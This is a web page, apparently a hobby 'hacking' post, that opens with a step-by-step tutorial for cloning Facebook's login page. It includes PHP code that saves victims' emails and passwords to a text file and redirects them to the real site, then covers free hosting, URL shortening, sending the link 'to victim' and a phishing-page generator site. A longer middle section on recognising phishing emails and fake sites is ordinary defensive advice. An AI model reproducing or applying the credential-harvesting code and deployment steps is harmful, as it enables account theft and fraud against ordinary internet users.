Phishing

PHISHING (HACK FB/AMEZON/FLIPCART) 


Phishing refers to obtaining confidential data (mainly user IDs and passwords) from internet users, typically by sending an unsuspecting user a link that appears to come from a legitimate source but leads to a fake version of the real site.




LETS CREATE A PHISHING WEBSITE FOR HACKING FACEBOOK..



 1) Go to facebook.com

2) right click or press ctrl+u to view source code of site.

3)copy the whole code (ctrl+a)and (ctrl+c)

4)paste it in text editor( used sublime)

5)find action="post"

6)than replace contents in that action=""

7)replace it with action="hack.php" and save it as index.html

8)now copy pate below code and save it as hack.php

<? if(isset($_POST[’email’]) && isset($_POST[‘pass’])) { $password=file_get_contents(‘hack.txt’); $phishing = fopen(“phishing.txt”,”w”); fwrite($phishing,$password.”Email : “.$_POST[’email’].” , Password”.$_POST[‘pass’].”\n”); fclose($file); echo ‘<script>window.location.href=”https://wwww.facebook.com/”</script>’; } else echo ‘<script>window.location.href=”index.html”</script>’; ?>


9)create hack.txt file

10)now upload this all files to any free web hosting site like

 a)my3gb.com

 b)000webhost.com


10)check it by visiting it

11)now encrypt the url or used url shortner to short the url.

12)send it to victim




Recognizing Phishing and Fake Websites


The good news is that you can avoid scams by looking for telltale signs that indicate when a site is fake or an email is phishy. The next time you are not completely confident that you are on a legitimate website or that an email you received is valid, check for these signs:


1) Uses an incorrect URL—If you are used to going to your bank via a regular address and the address of the site you land at is not the same name, you can be confident that you are not at the real site. Always double check to make sure that the site address is accurate.
You can also hover your mouse pointer over a link in the email to verify that the link is directed to the same site that the email came from.
 

2) Asks for banking information—A real bank would never ask for your bank account information or your debit card and PIN numbers via email. Be wary of any email or site that asks for sensitive information (such as your social security number) that is beyond your standard login.

3) Uses a public Internet account—Before you click on any link sent to you by email, take a look at the sender’s email address. If the email is from a public account, but claims to be from your bank or other business, do not trust the email. Moreover, do not trust any email or website that asks you to “confirm” sensitive account information, because this is surely a scam.
 

You should also make sure that any email claiming to be from your bank includes your given name in the message, such as “Dear William Smith,” instead of “Dear Valued Customer.” Real banks address messages to you by name as a way of confirming your relationship.


4) Includes misspelled words—If a bank asks you to log in to your “acccount,” this is a pretty good clue that you’ve stumbled upon a phishing email or fake website. Real companies have staff checking the accuracy of emails and websites, and a mistake like this would be caught before it was sent or published. If you see a misspelling or a misuse of the company name, look for other mistakes and clues to confirm your suspicions—and don’t enter any of your personal information on the site.



5) Is not a secure site—Legitimate e-commerce sites use encryption, or scrambling, to help ensure that your payment information remains safe. You can see if a site uses encryption by looking for a lock symbol in the browser window. Clicking on the lock symbol allows you to verify that a security certificate was issued to that site, a sign that it’s a legitimate, trusted website. You should also check that the address starts with “https://” rather than just “http://”.
Do not enter payment information on any site that isn’t secure.



6) Displays low resolution images—Scammers usually erect fake sites quickly, and this shows in the quality of the sites. If the logo or text appears in poor resolution, this is an important clue that the site could be phony.

Protecting Yourself

While these tips will go a long way in helping you identify phishing and fake sites, keep in mind that the scammers are always looking for ways to up their game and make their scams more convincing. It helps to be aware of the mental shortcuts you use and to really take the time to ask yourself if the site seems legitimate. Here are some ways in which you can avoid being caught in a cybercriminal’s net:


1) Educate yourself—Read up on the latest scams so you know what to look out for. And be familiar with what a phish looks like so you can recognize common tricks when you see them.

2) Use common sense—Read your emails carefully, checking to make sure you know the sender, and be suspicious of any email that asks for your personal or financial information. Also be very cautious when downloading any attachments or files from an email, unless you know and trust the sender.

3) Practice smart surfing—When on the web, make sure that the website you’re visiting is secure before you enter any information. If you have any doubts, enter a fake password since phony sites will accept false information. To better protect yourself, you may also want to use a search engine to help you navigate since they can catch misspellings and prevent you from landing on fake websites. Also, use a search tool such as McAfee® SiteAdvisor®, which indicates in your search results whether sites are safe or not.


4) Use technology to protect you—Comprehensive security software with anti-phishing technologies, like McAfee SecurityCenter, available pre-loaded on Dell™ PCs, can help protect you. Just make sure that your software is up to date with the latest security protections by enabling automatic updates or clicking the “update” button on your security software control panel.



5) Be vigilant all the time—You also want to take precautions when you’re offline, such as monitoring your bank and credit card statements for any suspicious charges or transfers. And consider changing your passwords regularly. Make sure you create strong passwords that use a combination of letters, numbers, and special characters, and that don’t use nicknames, birthdays, or other information that other people may know.


How to identify a phishing e-mail.

  1. Company - These e-mails are sent out to thousands of different e-mail addresses and often the person sending these e-mails has no idea who you are. If you have no affiliation with the company the e-mail is supposedly coming from, it is fake. For example, the e-mail claims to come from Wells Fargo bank but you bank at a different bank.
  2. Spelling and grammar - Improper spelling and grammar are almost always a dead giveaway. Look for obvious errors.
  3. No mention of account information - If the company were sending you information regarding errors to your account, they would mention your account or username in the e-mail. In the above example, the e-mail just says "eBay customer"; if this were eBay, they would mention your username.
  4. Deadlines - The e-mail requests an immediate response or sets a specific deadline. For example, in the above example, the requirement to log in and change your account information within 24 hours.
  5. Links - Although many phishing e-mails are getting better at hiding the true URL you are visiting, often these e-mails will list a URL that is not related to the company's URL. For example, in our above eBay example, "http://fakeaddress.com/ebay" is not an eBay URL, just a URL with an "ebay" directory. If you are unfamiliar with how a URL is structured, see the URL definition for additional information.

What to do if you are not sure if an e-mail is official.

  • Never follow any links in an e-mail. Instead of following the link in the e-mail, visit the page by manually typing the address of the company. For example, in the above example, instead of visiting the fake eBay URL, you would type: http://www.ebay.com in your web browser and log in to the official website.
  • Never send any personal information through e-mail. If a company is requesting personal information about your account or is saying your account is invalid, visit the web page and log into the account as you normally would.
  • Finally, if you are still concerned about your account or are concerned about your personal information, contact the company directly, either through their e-mail address or over the phone.

Issues phishing e-mails commonly address

Below are some of the issues a phishing e-mail may inquire about to trick users.
  • Account issues, such as account or password expiring, account being hacked, account out-of-date, or account information needing to be changed.
  • Credit card or other personal information, such as credit card expiring or being stolen, incorrect social security number or other personal information, or duplicate credit card or other personal information.
  • Confirming orders, such as a request that you log in to confirm recent orders or transactions.

Common companies affected by phishing

Below is a listing of companies phishers most often try to attack.
  • Any major bank
  • Popular websites such as Amazon, Facebook, MySpace, PayPal, eBay, Microsoft, Apple, Hotmail, YouTube, etc.
  • Government: FBI, CIA, IRS, etc.
  • Internet service providers such as AOL, Comcast, Cox, MSN, etc.
  • Casinos and lottery.
  • Online dating or community websites.

CREATE EASY PHISHING PAGES WITH

https://phish5.com
